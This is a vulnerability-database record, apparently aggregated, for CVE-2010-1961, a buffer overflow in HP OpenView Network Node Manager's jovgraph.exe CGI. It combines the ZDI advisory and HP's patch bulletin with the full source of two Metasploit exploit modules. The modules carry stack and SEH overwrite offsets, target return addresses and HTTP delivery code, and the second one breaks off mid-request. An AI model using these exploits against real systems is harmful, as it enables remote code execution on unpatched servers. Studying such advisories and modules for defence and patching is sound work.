ID CVE-2010-1961 Type cve Reporter NVD Modified 2018-10-10T15:58:04
Description
Buffer overflow in ovutil.dll in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unspecified variables to jovgraph.exe, which are not properly handled in a call to the sprintf function.
{"securityvulns": [{"lastseen": "2018-08-31T11:10:35", "references": [], "description": "ZDI-10-106: Hewlett-Packard OpenView NNM ovutil.dll getProxiedStorageAddress Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-106\r\nJune 8, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1961\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9283. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard OpenView Network Node\r\nManager. Authentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the ovutil.dll module which is loaded by\r\nthe ovwebsnmpsrv.exe process which in turn can be reached remotely\r\nthrough the jovgraph.exe CGI program. By supplying overly large values\r\nto variables passed through an HTTP request a sprintf can be made to\r\noverflow a static buffer. An attacker can leverage this to execute\r\narbitrary code under the context of the user running the webserver.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\r\n\r\n-- Disclosure Timeline:\r\n2010-02-02 - Vulnerability reported to vendor\r\n2010-06-08 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "reporter": "Securityvulns", "published": "2010-06-09T00:00:00", "title": "ZDI-10-106: Hewlett-Packard OpenView NNM ovutil.dll getProxiedStorageAddress Remote Code Execution Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-1961"], "modified": "2010-06-09T00:00:00", "id": "SECURITYVULNS:DOC:24032", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24032", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02217439\r\nVersion: 1\r\n\r\nHPSBMA02537 SSRT010027 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-06-08\r\nLast Updated: 2010-06-08\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM).\r\nThese vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user\r\nrunning the web server.\r\n\r\nReferences: CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\r\n\r\nCVE-2010-1961 (SSRT100028, ZDI-CAN-685)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-1961 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2010-1962 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks an anonymous researcher working with the TippingPoint Zero Day\r\nInitiative for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOV NNM v7.53\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_40708 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_40707 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00103 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00104 or subsequent\r\n\r\nSolaris\r\n PSOV_03527 or subsequent\r\n\r\nWindows\r\n NNM_01203 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nNNM v7.51 - Upgrade to v7.53 and apply the appropriate patches.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to\r\na specific HP-UX system. It can also download patches and create a depot automatically. For more information\r\nsee https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patches listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 8 June 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using\r\nPGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user\r\nsituations and, consequently, HP will not be responsible for any damages resulting from user's use or\r\ndisregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all\r\nwarranties, either express or implied, including the warranties of merchantability and fitness for a\r\nparticular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided "as is" without warranty of any kind. To the extent permitted\r\nby law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of\r\nsubstitute products or services; or damages for loss of data, or software restoration. The information in\r\nthis document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard Company in the United States and other\r\ncountries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkwOTlEACgkQ4B86/C0qfVm5SACfWCQvBjwzHqYuJBo4d1P/tXVE\r\nqJsAn33kFyVbhdpEfe0lHYAFtJcXQJc4\r\n=VmqM\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-06-09T00:00:00", "title": "[security bulletin] HPSBMA02537 SSRT010027 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-1961", "CVE-2010-1962", "CVE-2010-1960"], "modified": "2010-06-09T00:00:00", "id": "SECURITYVULNS:DOC:24034", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24034", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24034", "https://vulners.com/securityvulns/securityvulns:doc:24032", "https://vulners.com/securityvulns/securityvulns:doc:24095", "https://vulners.com/securityvulns/securityvulns:doc:24033"], "description": "Memory corruption on HTTP and SNMP request processing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-06-20T00:00:00", "title": "HP OpenView Network Node Manager multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:37", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenView Network Node Manager", "version": "7.53", "operator": "eq"}, {"name": "OpenView Network Node Manager", "version": "7.51", "operator": "eq"}], "cvelist": ["CVE-2010-1964", "CVE-2010-1961", "CVE-2010-1960"], "modified": "2010-06-20T00:00:00", "id": "SECURITYVULNS:VULN:10918", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10918", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:13", "references": ["http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the ovutil.dll module which is loaded by the ovwebsnmpsrv.exe process which in turn can be reached remotely through the jovgraph.exe CGI program. By supplying overly large values to variables passed through an HTTP request a sprintf can be made to overflow a static buffer. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.", "reporter": "Anonymous", "published": "2010-06-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Hewlett-Packard OpenView NNM ovutil.dll getProxiedStorageAddress Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2010-1961"], "modified": "2010-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-10-106", "id": "ZDI-10-106", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T14:51:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1961"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71519", "id": "SSV:71519", "sourceData": "\n ##\r\n# $Id: hp_nnm_ovwebsnmpsrv_main.rb 12097 2011-03-23 15:45:48Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\r\n\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\r\n\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\r\n\r\n\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. The buffer being\r\n\t\t\t\twritten to is 1024 bytes in size. It is important to note that this vulnerability must\r\n\t\t\t\tbe exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\r\n\r\n\t\t\t\tThe vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a\r\n\t\t\t\ttimestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\r\n\t\t\t\teasily achieved by overwriting SEH structures.\r\n\r\n\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\r\n\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\r\n\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\r\n\t\t\t\teither.\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12097 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1964' ],\r\n\t\t\t\t\t[ 'OSVDB', '65552' ],\r\n\t\t\t\t\t[ 'BID', '40873' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-108/' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024, # 1024 byte buffer..\r\n\t\t\t\t\t# In addition to regular HTTP type bad chars, this one also has\r\n\t\t\t\t\t# an issue with " since the buffer is being passed on the command line.\r\n\t\t\t\t\t'BadChars' => "\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Debug Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef, # crasher\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'June 16 2010'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tprint_status("Trying target #{target.name}...")\r\n\r\n\t\tcgi = '/OvCgi/jovgraph.exe'\r\n\r\n\t\t# Any command line parameter will cause a buffer overflow.\r\n\r\n\t\t# "action" must be set\r\n\t\taction = rand_text_alphanumeric(1)\r\n\r\n\t\t# "sel" must be set\r\n\t\tsel = rand_text_alphanumeric(1)\r\n\r\n\t\t# "timestamp" cannot be set.\r\n\r\n\t\t# SEH\r\n\t\tseh_offset = 1132\r\n\t\tseh_frame = generate_seh_record(target.ret)\r\n\r\n\t\t# Jump back to the payload, after p/p/r jumps to us.\r\n\t\tdistance = seh_offset + seh_frame.length\r\n\t\tdistance -= 1 # skip the first byte (cannot be -/+)\r\n\t\tjmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string\r\n\r\n\t\t# Create the buffer\r\n\t\tbuf = ''\r\n\t\t# The first character cannot be a - or a +\r\n\t\tbuf << rand_text(1, payload_badchars + "+-")\r\n\t\tbuf << payload.encoded\r\n\t\tbuf << rand_text(seh_offset - buf.length)\r\n\t\tbuf << seh_frame\r\n\t\tbuf << jmp_back\r\n\r\n\t\t# Force an exception writing off the end of the stack\r\n\t\tbuf << rand_text(6500 - buf.length)\r\n\r\n\t\t# Send the request\r\n\t\tif rand(2) > 0\r\n\t\t\tprint_status("Sending exploit via POST request...")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => "POST",\r\n\t\t\t\t'vars_post' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'sel' => sel,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'arg' => buf\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\telse\r\n\t\t\tprint_status("Sending exploit via GET request...")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => "GET",\r\n\t\t\t\t'vars_get' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'sel' => sel,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'arg' => buf\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\tend\r\n\r\n\t\tif not res\r\n\t\t\traise RuntimeError, "Eek! We didn't get a response.. Exploiting this vuln should return one!"\r\n\t\tend\r\n\r\n\t\tprint_status(res.body) if datastore["NNM_DEBUG"]\r\n\r\n\t\tif res.body =~ /graphing applet is being/\r\n\t\t\tprint_status("We got the body we were looking for, the session should be coming any second.")\r\n\t\telse\r\n\t\t\traise RuntimeError, "Eek, exploit likely failed. The body didn't contain what we expected."\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef wfs_delay\r\n\t\t5\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71519", "status": "cve,poc"}], "exploitdb": [{"lastseen": "2016-02-02T07:06:06", "osvdbidlist": ["65428"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow. CVE-2010-1961. Remote exploit for windows platform", "reporter": "metasploit", "published": "2011-03-23T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1961"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2011-03-23T00:00:00", "id": "EDB-ID:17044", "href": "https://www.exploit-db.com/exploits/17044/", "sourceData": "##\r\n# $Id: hp_nnm_ovwebsnmpsrv_ovutil.rb 12096 2011-03-23 15:44:55Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\r\n\t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\r\n\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\r\n\r\n\t\t\t\tThis vulnerability is triggerable via either a GET or POST request. It is interesting to\r\n\t\t\t\tnote that this vulnerability cannot be exploited by overwriting SEH, since attempting\r\n\t\t\t\tto would trigger CVE-2010-1964.\r\n\r\n\t\t\t\tThe vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\r\n\t\t\t\twith a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\r\n\t\t\t\twhich is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\r\n\t\t\t\tprocessing the address results in an error, the buffer is overflowed in a call to sprintf_new.\r\n\t\t\t\tThere are no stack cookies present, so exploitation is easily achieved by overwriting the\r\n\t\t\t\tsaved return address.\r\n\r\n\t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\r\n\t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\r\n\t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\r\n\t\t\t\teither.\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12096 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1961' ],\r\n\t\t\t\t\t[ 'OSVDB', '65428' ],\r\n\t\t\t\t\t[ 'BID', '40638' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-106/' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512, # 256 byte buffer..\r\n\t\t\t\t\t# In addition to regular HTTP type bad chars, this one also has\r\n\t\t\t\t\t# an issue with \" since the buffer is being passed on the command line.\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PopPopRet' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166)\r\n\t\t\t\t\t\t\t'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PopPopRet' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\r\n\t\t\t\t\t\t\t'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Debug Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PopPopRet' => 0xdeadbeef, # crasher\r\n\t\t\t\t\t\t\t'JmpEsp' => 0xbeefcafe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'June 16 2010'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tcgi = '/OvCgi/jovgraph.exe'\r\n\r\n\t\t# Any command line parameter will cause a buffer overflow.\r\n\r\n\t\t# \"action\" must be set\r\n\t\taction = rand_text_alphanumeric(1)\r\n\r\n\t\t# \"sel\" must be set\r\n\t\tsel = rand_text_alphanumeric(1)\r\n\r\n\t\t# \"timestamp\" cannot be set.\r\n\r\n\t\tstart = 'No entry for '\r\n\r\n\t\tret_offset = 256 + 4 + 12 + 4\r\n\r\n\t\t# Create the buffer\r\n\t\tbuf = ''\r\n\t\tbuf << rand_text(ret_offset - start.length)\r\n\t\tbuf << [target['PopPopRet']].pack('V')\r\n\t\tbuf << [0x5a400141].pack('V') # ptr to zero\r\n\t\tbuf << [0x5a459fdc].pack('V') # ptr to writable scratch\r\n\t\tbuf << [target['JmpEsp']].pack('V')\r\n\t\t#buf << \"\\xcc\"\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Ugh, triggers cve-2010-1964\r\n\t\t#buf = pattern_create(1456)\r\n\r\n\t\t# Send the request\r\n\t\tif rand(2) > 0\r\n\t\t\tprint_status(\"Sending exploit via POST request...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => 